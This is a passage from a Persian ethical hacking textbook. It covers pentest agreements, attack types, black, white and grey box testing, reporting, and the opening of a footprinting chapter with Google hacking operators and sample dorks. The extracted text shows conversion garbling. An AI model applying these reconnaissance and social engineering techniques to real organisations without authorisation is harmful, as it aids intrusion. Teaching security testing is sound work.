ﻣﺮﺣﻠﻪ آﻣﺎده ﺳﺎزي، ﺗﻮاﻓﻖ رﺳﻤﻲ ﺑﻴﻦ ﻫﻜﺮ ﻗﺎﻧﻮﻧﻤﻨﺪ و ﺳﺎزﻣﺎن اﺳﺖ . اﻳﻦ ﺗﻮاﻓﻖ ، ﺑﺎﻳﺪ ﻛﻞ داﻣﻨﻪ ﺗﺴﺖ و ﻧﻮع ﺣﻤﻼت و ﻧﻮع ﺗﺴﺖ را ﺷﺎﻣﻞ ﺷﻮد . .

اﻧﻮاع ﺣﻤﻼت ﻗﺎﻧﻮﻧﻤﻨﺪ

ﻫﻜﺮﻫﺎي ﻗﺎﻧﻮﻧﻤﻨﺪ، در ﻃﻮل ﺷﺒﻴﻪ ﺳﺎزي ﺣﻤﻠﻪ ﻳﺎ ﺗﺴﺖ ﻧﻔﻮذ، از روش ﻫﺎي زﻳﺎدي ﺑﺮ اي ﺑﻪ ﺧﻄﺮ اﻧﺪاﺧﺘﻦ اﻣﻨﻴﺖ ﺳﺎزﻣﺎن اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . ﻣﻬﻢ ﺗﺮﻳﻦ روش ﻫﺎ ﻋﺒﺎرﺗﻨﺪ از : :

ﺷﺒﻜﻪ راه دور ( remote ): در اﻳﻦ ﺣﻤﻠﻪ ﺳﻌﻲ ﻣﻲ ﺷﻮد ﻛﻪ ﺣﻤﻠﻪ از ﻃﺮﻳﻖ اﻳﻨﺘﺮﻧﺖ ﺷﺒﻴﻪ ﺳﺎزي ﺷﻮد . ﻫﻜﺮ ﻗﺎﻧﻮﻧﻤﻨﺪ، ﺗﻼش ﻣﻲ ﻛﻨﺪ ﺗﺎ در دﺳﺘﮕﺎه ﻫﺎي دﻓﺎﻋﻲ ﺷﺒﻜﻪ از ﻗﺒﻴﻞ ﻓﺎﻳﺮوال، ﭘﺮوﻛﺴﻲ، ﻳﺎ روﺗﺮ آﺳﻴﺐ ﭘﺬﻳﺮي ﭘﻴﺪا ﻛﻨﺪ . .

ﺷﺒﻜﻪ راه دور dial-up: در اﻳﻦ ﺣﻤﻠﻪ ﺳﻌﻲ ﻣﻲ ﺷﻮد ﻛﻪ ﺑﻪ ﻣﻮدم ﻫﺎي ﻣﺸﺘﺮي ﺣﻤﻠﻪ ﺷﻮد . War dialing ، ﻓﺮآﻳﻨﺪ ﺗﻜﺮار ﺗﻤﺎس ﺑﺮاي ﻳﺎﻓﺘﻦ ﺳﻴﺴﺘﻢ ﺑﺎز اﺳﺖ . .

ﺷﺒﻜﻪ ﻣﺤﻠﻲ: اﻳﻦ ﺣﻤﻠﻪ، ﺷﺨﺼﻲ را ﺷﺒﻴﻪ ﺳﺎزي ﻣﻲ ﻛﻨﺪ ﻛﻪ دﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ و ﻏﻴﺮ ﻣﺠﺎز ﺑﻪ ﺷﺒﻜﻪ دارد . ﺑﺮاي اﻧﺠﺎم اﻳﻦ ﺣﻤﻠﻪ، ﻫﻜﺮ ﻗﺎﻧﻮﻧﻤﻨﺪ ﺑﺎﻳﺪ ﺑﻪ ﺷﺒﻜﻪ دﺳﺘﺮﺳﻲ ﻣﺴﺘﻘﻴﻢ داﺷﺘﻪ ﺑﺎﺷﺪ . .

ﺳﺮﻗﺖ ﺗﺠﻬﻴﺰات: در اﻳﻦ ﺣﻤﻠﻪ، ﺳﺮﻗﺖ ﻣﻨﺎﺑﻊ اﻃﻼﻋﺎﺗﻲ ﻣﻬﻢ از ﻗﺒﻴﻞ ﻟﭗ ﺗﺎپ ﻫﺎي ﻛﺎرﻣﻨﺪان، ﺷﺒﻴﻪ ﺳﺎزي ﻣﻲ ﺷﻮد . ﺑﺎ ﺳﺮﻗﺖ ﻟﭗ ﺗﺎپ، اﻃﻼﻋﺎﺗﻲ ﻫﻤﭽﻮن ﻧﺎم ﻛﺎرﺑﺮي، ﭘﺴﻮردﻫﺎ، ﺗﻨﻈﻴﻤﺎت اﻣﻨﻴﺘﻲ و اﻧﻮاع رﻣﺰﮔﺬاري ﺑﺪﺳﺖ ﻣﻲ .آﻳﺪ .آﻳﺪ

14

ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ: اﻳﻦ ﺣﻤﻠﻪ، ﻛﺎرﻣﻨﺪان ﺳﺎزﻣﺎن را ﺑﺎ اﺳﺘﻔﺎده از ﺗﻠﻔﻦ ﻳﺎ ارﺗﺒﺎﻃﺎت رو در رو ﺑﺮاي ﺟﻤﻊ آوري اﻃﻼﻋﺎت ﻣﻮرد ﻧﻴﺎز ﺣﻤﻠﻪ، ﻣﻮرد ارزﻳﺎﺑﻲ ﻗﺮار ﻣﻲ ﺪﻨدﻫ . ﺣﻤﻼت ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ، ﺑﺮاي ﺑﺪﺳﺖ آوردن ﻧﺎم ﻫﺎي ﻛﺎرﺑﺮي، ﭘﺴﻮردﻫﺎ، ﻳﺎ دﻳﮕﺮ اﻃﻼﻋﺎت اﻣﻨﻴﺘﻲ ﺳﺎزﻣﺎﻧﻲ اﺳﺘﻔﺎده ﻣﻲﺷ .ﻮﻧﺪ .ﻮﻧﺪ

ورود ﻓﻴﺰﻳﻜﻲ: اﻳﻦ ﺣﻤﻠﻪ ﺗﻼش ﻣﻲ ﻛﻨﺪ ﺗﺎ ﻣﺤﻴﻂ ﻓﻴﺰﻳﻜﻲ ﺳﺎزﻣﺎن را ﺑﻪ ﺧﻄﺮ ﺑﻴﺎﻧﺪازد . ﻳﻌﻨﻲ ﺑﺎ دﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﺑﻪ آن، ﻣﻲ ﺗﻮاﻧﺪ وﻳﺮوس ﻫﺎ، ﺗﺮوﺟﺎن ﻫﺎ، rootkit ﻫﺎ ﻳﺎ key logger ﻫﺎي ﺳﺨﺖ اﻓﺰاري را ﺑﺮ روي ﺳﻴﺴﺘﻢ ﻫﺎي ﺷﺒﻜﻪ ﻫﺪف ﻧﺼﺐ ﻛﻨﺪ . .

اﻧﻮاع ﺗﺴﺖ

ﺗﺴﺖ اﻣﻨﻴﺘﻲ، اوﻟﻴﻦ ﻛﺎر ﻫﻜﺮﻫﺎي ﻗﺎﻧﻮﻧﻤﻨﺪ اﺳﺖ . ﻣﻤﻜﻦ اﺳﺖ اﻳﻦ ﺗﺴﺖ ﻫﺎ در ﺣﺎﻟﺘﻲ ﺑﺎﺷﺪ ﻛﻪ ﻫﻜﺮﻫﺎ ﻫﻴﭻ داﻧﺶ ﻳﺎ داﻧﺶ ﺟﺰﺋﻲ در ﻣﻮرد ﻫﺪف ﻣﻮرد ارزﻳﺎﺑﻲ ( target of evaluation ) داﺷﺘﻪ ﺑﺎﺷﻨﺪ و ﻳﺎ اﻳﻨﻜﻪ ﻫﻤﻪ اﻃﻼﻋﺎت ﻻزم را داﺷﺘﻪ ﺑﺎﺷﻨﺪ . .

ﺗﺴﺖ ﺑﺪون داﻧﺶ ( ﺟﻌﺒﻪ ﺳﻴﺎه ) )

ﺗﺴﺘﻲ ﻛﻪ ﺑﺪون ﻫﻴﭻ داﻧﺸﻲ ﺻﻮرت ﻣﻲ ﮔﻴﺮد ﺑﺎ ﻧﺎم ﺗﺴﺖ ﺟﻌﺒﻪ ﺳﻴﺎه ( Black box ) ﺷﻨﺎﺧﺘﻪ ﻣﻲ ﺷﻮد . ﺑﻪ ﺑﻴﺎﻧﻲ ﺳﺎده ﺗﺮ ، ﺗﻴﻢ اﻣﻨﻴﺘﻲ ﻫﻴﭻ داﻧﺸﻲ در ﻣﻮرد ﺷﺒﻜﻪ ﻳﺎ ﺳﻴﺴﺘﻢ ﻫﺎ ي ﻫﺪف ﻧﺪارﻧﺪ . ﺗﺴﺖ ﺟﻌﺒﻪ ﺳﻴﺎه، ﻳﻚ ﻫﻜﺮ ﺧﺎرﺟﻲ را ﺷﺒﻴﻪ ﺳﺎزي ﻣﻲ ﻛﻨﺪ ﻛﻪ ﻫﻴﭻ داﻧﺸﻲ در ﻣﻮرد ﺷﺒﻜﻪ ﻳﺎ ﺳﻴﺴﺘﻢ ﻫﺎ ي ﻫﺪف ﻧﺪارد . ﺣﻤﻠﻪ ﻛﻨﻨﺪه ﺑﺎﻳﺴﺘﻲ ﻫﻤﻪ اﻃﻼﻋﺎت را را در ﻣﻮرد ﻫﺪف ﺑﺪﺳﺖ آورد . ﻣﺰاﻳﺎي ﺗﺴﺖ ﺟﻌﺒﻪ ﺳﻴﺎه ﻋﺒﺎرﺗﻨﺪ از : :

ﺗﺴﺖ واﻗﻌﻲ اﻣﻨﻴﺖ اﺳﺖ ﺑﺮاي اﻳﻨﻜﻪ ﻃﺮاح ﺷﺒﻜﻪ و ﺗﺴﺖ ﻛﻨﻨﺪه ﻣﺴﺘﻘﻞ از ﻳﻜﺪﻳﮕﺮﻧﺪ.
ﺗﺴﺖ ﻛﻨﻨﺪه، داﻧﺶ ﻗﺒﻠﻲ از ﺷﺒﻜﻪ ﻫﺪف ﻧﺪارد . ﺑﻨﺎﺑﺮاﻳﻦ، اﻳﺪه ﻫﺎ ﻳﺎ اﻓﻜﺎر ﻗﺒﻠﻲ در ﻣﻮرد ﻋﻤﻠﻜﺮد ﺷﺒﻜﻪ ﻧﺪارد.
ﺗﺴﺖ، ﻫﺪف را از دﻳﺪ ﺣﻤﻠﻪ ﻛﻨﻨﺪه ﺧﺎ رﺟﻲ آزﻣﺎﻳﺶ ﻣﻲ ﻛﻨﺪ.

ﻣﻌﺎﻳﺐ ﺗﺴﺖ ﺟﻌﺒﻪ ﺳﻴﺎه ﻋﺒﺎرﺗﻨﺪ از : :

زﻣﺎن ﺑﻴﺸﺘﺮي ﺑﺮاي ﺗﺴﺖ ﻫﺎ ي اﻣﻨﻴﺘﻲ ﺻﺮف ﻣﻲ ﻛﻨﺪ.
ﻣﻌﻤﻮﻻ ﺑﺴﻴﺎر ﮔﺮان ﻫﺴﺘﻨﺪ ﺑﺮاي اﻳﻨﻜﻪ زﻣﺎن ﺑﻴﺸﺘﺮي را ﺻﺮف ﻣﻲ ﻛﻨﻨﺪ.
ﺗﻨﻬﺎ ﺑﺮ روي آﻧﭽﻪ ﻛﻪ ﻫﻜﺮﻫﺎي ﺧﺎرﺟﻲ ﻣﻲ ﺑﻴﻨﻨﺪ ﺗﻤﺮﻛﺰ ﻣﻲ ﻛﻨﺪ در ﺣﺎﻟﻴﻜﻪ در واﻗﻌﻴﺖ، اﻏﻠﺐ ﻫﻜﺮﻫﺎ ﺗﻮﺳﻂ ﻛﺎرﻣﻨﺪان داﺧﻠﻲ ﺷﺮوع ﺑﻪ ﻛﺎر ﻣﻲ ﻛﻨﻨﺪ. 15

ﺗﺴﺖ ﺑﺎ داﻧﺶ ﻛﺎﻣﻞ ( ﺟﻌﺒﻪ ﺳﻔﻴﺪ ) )

ﺗﺴﺖ ﺟﻌﺒﻪ ﺳﻔﻴﺪ، روﻳﻜﺮد ﻣﺘﻀﺎد در ﺑﺮاﺑﺮ ﺗﺴﺖ ﺟﻌﺒﻪ ﺳﻴﺎه دارد . اﻳﻦ ﺷﻜﻞ از ﺗﺴﺖ اﻣﻨﻴﺘﻲ، ﻓﺮض ﻣﻲ ﺷﻮد ﻛﻪ ﺗﺴﺖ ﻛﻨﻨﺪه اﻣﻨﻴﺘﻲ، داﻧﺶ ﻛﺎﻣﻞ از ﺷﺒﻜﻪ، ﺳﻴﺴﺘﻢ ﻫﺎ و زﻳﺮﺳﺎﺧﺖ دارد . اﻳﻦ اﻃﻼﻋﺎت ﺑﻪ ﺗﺴﺖ ﻛﻨﻨﺪه اﺟﺎزه ﻣﻲ دﻫﺪ روﻳﻜﺮد ﺳﺎﺧﺖ ﻳﺎﻓﺘﻪ داﺷﺘﻪ ﺑﺎﺷﺪ و ﺗﻨﻬﺎ ﺑﺮ روي اﻃﻼﻋﺎت ﻣﻮﺟﻮد اﻛﺘﻔﺎ ﻧﻜﻨﺪ و ﺻﺤﺖ و دﻗﺖ آﻧﻬﺎ را ﻫﻢ ﺑﺮرﺳﻲ ﻛﻨﺪ . ﺑﻨﺎﺑﺮاﻳﻦ، ﻫﺮ ﭼﻨﺪ ﻛﻪ ﺗﺴﺖ ﺟﻌﺒﻪ ﺳﻴﺎه زﻣﺎن ﺑﻴﺸﺘﺮي ﺑﺮاي ﺟﻤﻊ آوري اﻃﻼﻋﺎت ﻣﻲ ﮔﻴﺮد، ﺗﺴﺖ ﺟﻌﺒﻪ ﺳﻔﻴﺪ آن زﻣﺎن را ﺑﺮاي ﻳﺎﻓﺘﻦ آﺳﻴﺐ ﭘﺬﻳ ﺮي ﻫﺎ ﺻﺮف ﻣﻲ ﻛﻨﺪ . .

ﺗﺴﺖ ﺑﺎ داﻧﺶ ﺟﺰﺋﻲ ( ﺟﻌﺒﻪ ﺧﺎﻛﺴﺘﺮي ) )

در دﻧﻴﺎي ﺗﺴﺖ ﻧﺮم اﻓﺰار، ﺗﺴﺖ ﺟﻌﺒﻪ ﺧﺎﻛﺴﺘﺮي ، ﺑﻪ ﻋﻨﻮان ﺗﺴﺖ ﺑﺎ داﻧﺶ ﺟﺰﺋﻲ ﺗﻠﻘﻲ ﻣﻲ ﺷﻮد . در اﻳﻦ ﺗﺴﺖ، ﻫﺪف اﻳﻦ اﺳﺖ ﻛﻪ ﺑ ﺪاﻧﻴﻢ ﻛﺎرﻣﻨﺪان ﭼﻪ ﭼﻴﺰي را ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﻪ دﺳﺖ آورﻧﺪ . اﻳﻦ ﻧﻮع ﺗﺴﺖ، ﻣﻤﻜﻦ اﺳﺖ ﺑﺮاي ﺳﺎزﻣﺎن ﻫﺎ ﻫﺎ ﺑﺴﻴﺎر ﻣﻔﻴﺪ ﺑﺎﺷﺪ ﺑﺮاي اﻳﻨﻜﻪ ﺑﺴﻴﺎري از ﺣﻤﻼت ﺗﻮﺳﻂ ﻛﺎرﻣﻨﺪان داﺧﻞ ﺳﺎزﻣﺎن ﺷﺮوع ﻣﻲ ﺷﻮﻧﺪ . .

16

ﮔﺰارش ﻫﻚ ﻗﺎﻧﻮﻧﻤﻨﺪ

ﮔﺰارش ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﺟﺰﺋﻴﺎت ﻧﺘﺎﻳﺞ ﺑﺪﺳﺖ آﻣﺪه ﺑﺎﺷﺪ . آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎ ﺑﺎﻳﺪ ﺑﻪ ﻋﻨﻮان رﻳﺴﻚ ﺑﺤﺚ ﺷﻮ ﻧﺪ . ﮔﺰارش ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﻧﺘﺎﻳﺞ ارزﻳﺎﺑﻲ ﺑﻪ ﺻﻮرت ﺳﺎده، ﻗﺎﺑﻞ ﻓﻬﻢ، و ﻗﺎﺑﻞ ردﮔﻴﺮي ﺑﺎﺷﺪ . ﺑﺎﻳﺴﺘﻲ ﮔﺰارش ﺑﺼﻮرت ﻓﺮاﮔﻴﺮ و ﺧ ﻮدآﻣﻮز ﺑﺎﺷﺪ . اﻏﻠﺐ ﮔﺰارﺷﺎت ﺷﺎﻣﻞ ﺑﺨﺶ ﻫﺎ ي زﻳﺮ ﻫﺴﺘﻨﺪ : :

 ﻣﻘﺪﻣﻪ  ﺑﻴﺎن ﻛﺎرﻫﺎي اﻧﺠﺎم ﺷﺪه  ﻧﺘﺎﻳﺞ  ﭘﻴﺸﻨﻬﺎدات

از آﻧﺠﺎﺋﻴﻜﻪ ﺑﺴﻴﺎري از ﺷﺮﻛﺖ ﻫﺎ ، ﺑﻨﺎﺑﺮ دﻻﻳﻞ ﻣﺎﻟﻲ ﻧﻤﻲ ﺗﻮاﻧﻨﺪ ﻫﻤﻪ ﭼﻴﺰ را اﻣﻦ ﻛﻨﻨﺪ، ﻟﺬا ﺑﺎﻳﺴﺘﻲ ﭘﻴﺸﻨﻬﺎدات ﺑﺼﻮرت رﻳﺴﻚ ﭘﺮ ﺧﻄﺮ ﺗﺎ ﻛﻢ ﺧﻄﺮ ﻣﺮﺗﺐ ﺷﻮﻧﺪ . ﻳﻌﻨﻲ رﻳﺴﻚ ﻫﺎ ي ﻣﻬﻢ ﺗﺮ در ﺑﺎﻻي ﻟﻴﺴﺖ ﻗﺮار ﮔﻴﺮﻧﺪ . .

ﺑﺎﻳﺴﺘﻲ ﮔﺰارش را ﺑﺼﻮرت ﻛﺎﻣﻼ اﻣﻦ در ﻳﻚ وﺳﻴﻠﻪ ذﺧﻴﺮه ﺳﺎزي اﻟﻜﺘﺮوﻧﻴﻜﻲ ذﺧﻴﺮه ﻛﻨﻴﺪ و از رﻣﺰﮔﺬاري اﺳﺘﻔﺎده ﻛﻨﻴﺪ . ﻧﺴﺨﻪ ﭼﺎﭘﻲ از ﮔﺰا رش ﺑﺼﻮرت ﻣﺤﺮﻣﺎﻧﻪ ﺑﺮﭼﺴﺐ ﮔﺬاري ﺷﻮد و ﻣﺮاﻗﺒﺖ ﻫﺎ ي ﻛﺎﻓﻲ از آن ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از دﺳﺘﺮﺳﻲ اﺷﺨﺎص ﻏﻴﺮ ﻣﺠﺎز ﺑﻪ ﻋﻤﻞ آﻳﺪ.

17

ﻓﺼﻞ دوم

ﺟﻤﻊ آوري اﻃﻼﻋﺎت و ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ

ﻣﻘﺪﻣﻪ

اﻳﻦ ﻓﺼﻞ در ﻣﻮرد اوﻟﻴﻦ ﺑﺨﺶ از ﻓﺮآﻳﻨﺪ ﻫﻚ ﻛﻪ ﺟﻤﻊ آوري اﻃﻼﻋﺎت ( footprinting ) اﺳﺖ ﺑﺤﺚ ﻣﻲ ﻛﻨﺪ . footprinting ، ﻓﺮآﻳﻨﺪ ﺟﻤﻊ آوري ﺗﻤﺎم اﻃﻼﻋﺎت ﻗﺎﺑﻞ دﺳﺘﺮس در ﻣﻮرد ﻳﻚ ﺳﺎزﻣﺎن اﺳﺖ ا. ﻳﻦ اﻃﻼﻋﺎت ﻣ ﻲ ﺗﻮاﻧﺪ ﺑﺮاي ﻓﺮآﻳﻨﺪ ﻫﻚ اﺳﺘﻔﺎده ﺷﻮﻧﺪ . ﮔﺎﻫﻲ اوﻗﺎت، اﻳﻦ اﻃﻼﻋﺎت ﺑﺮاي اﻧﺠﺎم ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ ﻧﻴﺰ ﻣﻮرد اﺳﺘﻔﺎده ﻗﺮار ﻣﻲ ﮔﻴﺮﻧﺪ . .

در اﻳﻦ ﻓﺼﻞ د ر ﻣﻮرد ﻫﺮ دو روش ﻫﻚ ﺑﻪ ﺗﻔﺼﻴﻞ ﺗﻮﺿﻴﺢ ﺧﻮاﻫﻴﻢ داد . .

Footprinting

Footprinting ، ﺑﺨﺸﻲ از ﻣﺮﺣﻠﻪ ﭘﻴﺶ از ﺣﻤﻠﻪ اﺳﺖ ﻛﻪ ﺷﺎﻣﻞ ﺟﻤﻊ آوري اﻃﻼﻋﺎت ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻣﻌﻤﺎري و ﻣﺤﻴﻂ ﻫﺪف ﻣﻲ ﺑﺎﺷ ﺪ و ﻣﻌﻤﻮﻻ ﺑﺮاي ﻳﺎﻓﺘﻦ روﺷﻲ ﺟﻬﺖ ﻧﻔﻮذ ﺑﻪ ﻣﺤﻴﻂ ، اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . Footprinting ، آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي ﺳﻴﺴﺘﻢ را ﻛﺸﻒ ﻣﻲ ﻛﻨﺪ . اﻳﻦ، ﺳﺎده ﺗﺮﻳﻦ روش ﺑﺮاي ﻫﻜﺮﻫﺎ ﺑﺮاي ﺟﻤﻊ آوري اﻃﻼﻋﺎت در ﻣﻮرد ﺳﻴﺴﺘﻢ ﻫﺎي ﻛﺎﻣﭙﻴﻮﺗﺮي ﻫﺪف اﺳﺖ . ﻫﺪف اﻳﻦ ﻣﺮﺣﻠﻪ اﻳﻦ اﺳﺖ ﻛﻪ ﺗﺎ ﺟﺎﺋﻴﻜﻪ اﻣﻜﺎن دارد در ﻣﻮرد ﺳﻴﺴﺘﻢ ﻫﺎ، ﭘﻮرت ﻫﺎ و ﺳﺮوﻳﺲ ﻫﺎ، و ﺟﻨﺒﻪ ﻫﺎي اﻣﻨﻴﺘﻲ آﻧﻬﺎ اﻃﻼﻋﺎت ﻛﺴﺐ ﻛﻨﻴﻢ . .

ﺗﻌﺮﻳﻒ Footprinting

Footprinting ، ﻓﺮآﻳﻨﺪ ﺳﺎﺧﺖ ﻧﻘﺸﻪ اي از ﺷﺒﻜﻪ ﺳﺎزﻣﺎن و ﺳﻴﺴﺘﻢ ﻫﺎ اﺳﺖ . Footprinting ﺑﺎ ﺗﻌﻴﻴﻦ ﺳﻴﺴﺘﻢ، ﺑﺮﻧﺎﻣﻪ، ﻳﺎ ﻣﻜﺎن ﻓﻴﺰﻳﻜﻲ ﻣﻘﺼﺪ ﺷﺮوع ﻣﻲ ﺷﻮد . ﺑﺮاي ﻣﺜﺎل، وب ﺳﺎﻳﺖ ﺳﺎزﻣﺎن، اﻃﻼﻋﺎت ﭘﺮﺳﻨﻞ را دارد و ﻣﻲ ﺗﻮاﻧﺪ ﺑﻪ ﻫﻜﺮ ﺟﻬﺖ اﻧﺠﺎم ﺣﻤﻠﻪ ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ ﻛﻤﻚ ﻛﻨﺪ . ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ اﺳﺖ ﻫﻜﺮ ﺑﺎ اﺳﺘﻔﺎده از ﺟﺴﺘﺠﻮي ﮔﻮﮔﻞ ﻳﺎ ﻳﺎﻫﻮ، اﻃﻼﻋﺎت ﻛﺎرﻛﻨﺎن آن ﺳﺎزﻣﺎن را ﺑﺪﺳﺖ آور .د .د

19

ﻣﻮﺗﻮر ﺟﺴﺘﺠﻮي ﮔﻮﮔﻞ، روﺷﻲ ﺧﻼﻗﺎﻧﻪ ﺑﺮاي ﺟﻤﻊ آوري اﻃﻼﻋﺎت اﺳﺖ . اﺳﺘﻔﺎده از ﻣﻮﺗﻮر ﺟﺴﺘﺠﻮي ﮔﻮﮔﻞ ﺑﺮاي ﺑﺎزﻳﺎﺑﻲ اﻃﻼﻋﺎت، ﺑﻪ ﻋﻨﻮان Google hacking ﺷﻨﺎﺧﺘﻪ ﻣﻲ ﺷﻮد . http://groups.google.com ﺑﺮاي ﺟﺴﺘﺠﻮ درﺑﺎره ﮔﺮوه ﻫﺎي ﺧﺒﺮي ﮔﻮﮔﻞ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . ﻫﻤﭽﻨﻴﻦ http://people.yahoo.com و http://www.intellius.com ﺑﺮاي ﭘﻴﺪا ﻛﺮدن اﻃﻼﻋﺎت ا ﻓﺮاد ﺑ ﻪ ﻛﺎر ﻣﻲ روﻧﺪ . از دﺳﺘﻮرات زﻳﺮ ﻣﻲ ﺗﻮان ﺑﺮاي Google hacking اﺳﺘﻔﺎده :دﻛﺮ :دﻛﺮ

• Site ، داﺧﻞ ﺳﺎﻳﺖ ﻳﺎ داﻣﻴﻦ را ﺟﺴﺘﺠﻮ ﻣﻲ ﻛﻨﺪ . وب ﺳﺎﻳﺖ ﻳﺎ داﻣﻴﻦ ﻣﻮرد ﺟﺴﺘﺠﻮ ﺑﺎﻳﺪ ﺑﻌﺪ از ﻛﻮﻟﻦ ﺑﻨﻮﻳﺴﻴﺪ.

• Filetype ، ﺟﺴﺘﺠﻮ را ﻓﻘﻂ ﺑﺮاي ﻧﻮع ﺧﺎﺻﻲ از ﻓﺎﻳﻞ اﻧﺠﺎم ﻣﻲ دﻫﺪ، ﺑﺎﻳﺪ ﻧﻮع ﻓﺎﻳﻞ را ﺑﻌﺪ از ﻛﻮﻟﻦ ﺑﻨﻮﻳﺴﻴﺪ.

• Link ، داﺧﻞ hyperlink ،ﻫﺎ ﻳﻚ ﻛﻠﻤﻪ را ﺟﺴﺘﺠﻮ و ﺻﻔﺤﺎت ﻟﻴﻨﻚ ﺷﺪه را ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲ ﻛﻨﺪ. • Cache ، ﻧﺴﺨﻪ ﻳﻚ ﺻﻔﺤﻪ وب را ﻣﺸﺨﺺ ﻣﻲ ﻛﻨﺪ . آدرس ﺳﺎﻳﺖ را ﺑﺎﻳﺪ ﺑﻌﺪ از ﻛﻮﻟﻦ ذﻛﺮ ﻛﻨﻴ .ﺪ • Intitle ، ﺑﻪ دﻧﺒﺎل ﻛﻠﻤﻪ اي در داﺧﻞ ﻋﻨﻮان ﻳﻚ ﻓﺎﻳﻞ ﻣﻲ ﮔﺮدد . • Inurl ، ﺗﻨﻬﺎ داﺧﻞ آدرس ﻳﻚ ﻓﺎﻳﻞ ﺟﺴﺘﺠﻮ ﻣﻲ ﻛﻨﺪ . ﺑﺎﻳﺪ ﻛﻠﻤﻪ ﻣﻮرد ﺟﺴﺘﺠﻮ را ﺑﻌﺪ از ﻛﻮﻟﻦ ذﻛﺮ ﻛﻨﻴﺪ.

ﺑﺮاي ﻣﺜﺎل، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ از دﺳﺘﻮر زﻳﺮ ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ اﻧﻮاع ﻣﺸﺨﺺ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي ﺑﺮﻧﺎﻣﻪ ﻫﺎي وب اﺳﺘﻔﺎده ﻛﻨﺪ : [INURL: [“parameter=”] with FILETYPE: [ext] and INURL: [scriptname

و ﻳﺎ اﻳﻨﻜﻪ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ از ﻋﺒﺎرت زﻳﺮ ﺑﺮاي ﺳﺮورﻫﺎي Novell BorderManager اﺳﺘﻔﺎده ﻛﻨﺪ : :

Intiltle: “BorderManager information alert”

ﺑﺮاي ﭘﻴﺪا ﻛﺮدن اﻃﻼﻋﺎﺗﻲ درﺑﺎره ﻳﻚ ﺷﺮﻛﺖ ﻳﺎ ﭘﺮﺳﻨﻞ، ﻣﻲ ﺗﻮان از ﮔﺮوهﻫ ﺎي ﺧﺒﺮي، اﺧﺒﺎر ﻣﻨﺘﺸﺮ ﺷﺪه و ﺑﻼگ ﻫﺎ اﺳﺘﻔﺎده ﻛﺮد . ﭘﺴﺖ ﻫﺎي ﺷﻐﻠﻲ ﺳﺎزﻣﺎﻧﻲ ﻣﻲ ﺗﻮاﻧﻨ ﺪ اﻃﻼﻋﺎﺗﻲ در ﻣﻮرد ﻧﻮع ﺳﺮورﻫﺎ ﻳﺎ دﺳﺘﮕﺎه ﻫﺎي زﻳﺮﺳﺎﺧﺘﻲ ﺷﺒﻜﻪ ﺷﺮﻛﺖ ﺑﻪ ﺷﻤﺎ ﺑﺪﻫ .ﺪﻨ .ﺪﻨ

اﻃﻼﻋﺎت دﻳﮕﺮي ﻛﻪ ﻣﻲ ﺗﻮان در اﻳﻦ ﻣﺮﺣﻠﻪ در ﻣﻮرد ﻫﺪف ﺑﻪ دﺳﺖ آورد ﻋﺒﺎرﺗﻨﺪ از : ﺗﻜﻨﻮﻟﻮژي ﻫﺎي اﻳﻨﺘﺮﻧﺘﻲ، ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ و ﺳﺨﺖ اﻓﺰار ﻫﺎي ﻣﻮرد اﺳﺘﻔﺎده، آدرس ﻫﺎي IP ﻓﻌﺎل، آدرس ﻫﺎي ﭘﺴﺖ اﻟﻜﺘﺮوﻧﻴﻜﻲ و ﺷﻤﺎره ﺗﻠﻔﻦ ﻫﺎ ، و ﺳﻴﺎﺳﺖ ﻫﺎ و ﻓﺮآﻳﻨﺪﻫﺎي ﺳﺎزﻣﺎﻧﻲ اﺳﺖ . .

ﻫﻜﺮ، 90 % از زﻣﺎن را ﺑﺮاي ﺟﻤﻊ آوري اﻃﻼﻋﺎت ﺑﺮ روي ﻫﺪف و 10 % دﻳﮕﺮ را ﺑﺮ روي اﻧﺠﺎم ﺣﻤﻠﻪ ﺻﺮف ﻣﻲ ﻛﻨﺪ.

20

ﻣﺘﺪﻟﻮژي ﻫﺎي ﺟﻤﻊ آوري اﻃﻼﻋﺎت

ﺟﻤﻊ آوري اﻃﻼﻋﺎت، ﺑﻪ ﻫﻔﺖ ﻣﺮﺣﻠﻪ ﺗﻘﺴﻴﻢ ﻣﻲ ﺷﻮد . ﻓﺮآﻳﻨﺪ footprinting ، در ﻃﻮل دو ﻣﺮﺣﻠﻪ اول اﻧﺠﺎم ﻣﻲ ﺷﻮد . ﺑﺮﺧﻲ از ﻣﻨﺎﺑﻌﻲ ﻛﻪ ﺑﺮاي ﺟﻤﻊ آوري اﻃﻼﻋﺎت اﺳﺘﻔﺎده ﻣﻲ ﻧﺷﻮ ﺪ ﻋﺒﺎرﺗﻨﺪ از : :

Domain name lookup Whois Nslookup Sam Spade

ﻫﻔﺖ ﻣﺮﺣﻠﻪ ﺟﻤﻊ آوري اﻃﻼﻋﺎت

